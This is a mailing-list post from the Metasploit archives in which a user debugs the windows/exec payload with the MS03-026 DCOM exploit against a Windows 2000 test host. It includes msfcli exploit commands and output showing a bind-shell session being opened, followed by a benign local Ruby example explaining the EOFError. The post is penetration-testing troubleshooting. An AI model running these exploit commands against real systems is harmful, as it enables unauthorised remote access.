Metasploit mailing list archives
Re: windows/exec Payload problems.
From: a10n3.s7r1k3r at gmail.com (Kashif Iftikhar)
Date: Wed, 24 Jan 2007 13:34:19 +0000
Hello,

I was trying to work with the command execute payload and I can't seem to get it to work. I tested it on both 2.7 and 3.0 beta3 updated via SVN. I am using ms03_026_dcom (the DCOM RPC exploit). The system I am testing against is Windows 2000 Professional without any SPs installed. Here is a sample of output using msfcli from 3.0:

-------------------------------------------------------------------
root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/exec" CMD="md abc" RHOST="192.168.0.17" E
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ...
[*] Sending exploit ...
Exploit failed: end of file reached
Backtrace:
./lib/rex/io/stream.rb:58:in `sysread'
./lib/rex/io/stream.rb:58:in `read'
./lib/rex/io/stream.rb:181:in `get_once'
./lib/rex/proto/dcerpc/client.rb:150:in `read'
./lib/rex/proto/dcerpc/client.rb:230:in `call'
./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call'
/pentest/exploits/framework-3.0-beta-3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb:206:in `exploit'
./lib/msf/core/exploit_driver.rb:189:in `job_run_proc'
./lib/msf/core/exploit_driver.rb:152:in `run'
./lib/msf/base/simple/exploit.rb:118:in `exploit_simple'
./lib/msf/base/simple/exploit.rb:127:in `exploit_simple'
./msfcli:153

root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.0.21:58937 -> 192.168.0.17:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
-------------------------------------------------------------------------

As can be seen, other payloads like bind shell work fine. Also, one other strange thing that I noticed is that with 2.7 I can repeatedly exploit the same box and the service crashes after several successful attempts, while with 3.0 I only get one attempt; after one successful attempt, the service no longer seems to be exploitable. Am I doing something wrong here, or is it a bug? I am sorry if someone else has already pointed this out.

Regards,
Kashif.
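The "Exploit failed: end of file reached" line in the backtrace above is Ruby's EOFError, raised by sysread (called from Rex::IO::Stream#read) when the remote side closes the TCP connection before sending any reply; the bind_tcp run shows the same condition as "The DCERPC service did not reply to our request". The following is an added, stand-alone illustration of that failure mode, written for this archive page; it is not Metasploit code and does not talk to any RPC service. It uses a constructed request string and a local listener on 127.0.0.1 that either answers or silently hangs up, and wraps the read so the caller gets a clear "peer closed" result instead of an uncaught exception.

```ruby
require 'socket'

# Constructed sample payload for the local exchange below; it is not an RPC PDU.
REQUEST = "constructed-request".b

# Read one response from sock. Returns [:data, bytes] on success, or
# [:peer_closed, message] when the peer closed the connection without
# answering: sysread then raises EOFError ("end of file reached"), which is
# exactly the error surfaced in the msfcli backtrace.
def read_response(sock, max = 4096)
  [:data, sock.sysread(max)]
rescue EOFError => e
  [:peer_closed, e.message]
end

# Start a throwaway local server on a free port and return the port.
# With reply == nil the server consumes the request and closes without
# answering (what a service that has just died looks like from the client).
# Reading the request first ensures the close is seen as a clean FIN rather
# than a reset caused by unread data.
def start_server(reply)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  Thread.new do
    client = server.accept
    client.read(REQUEST.bytesize)
    client.write(reply) if reply
    client.close
    server.close
  end
  port
end

# One full client exchange against the local server.
def exchange(reply)
  port = start_server(reply)
  sock = TCPSocket.new('127.0.0.1', port)
  sock.write(REQUEST)
  result = read_response(sock)
  sock.close
  result
end

if __FILE__ == $PROGRAM_NAME
  p exchange("ack")   # => [:data, "ack"]
  p exchange(nil)     # => [:peer_closed, "end of file reached"]
end
```

The distinction matters when triaging a run like the one in the post: a peer-closed result right after the request means the service dropped the connection (typically because it crashed or was never listening), whereas a timeout means it is still up but not answering; the two call for different follow-up.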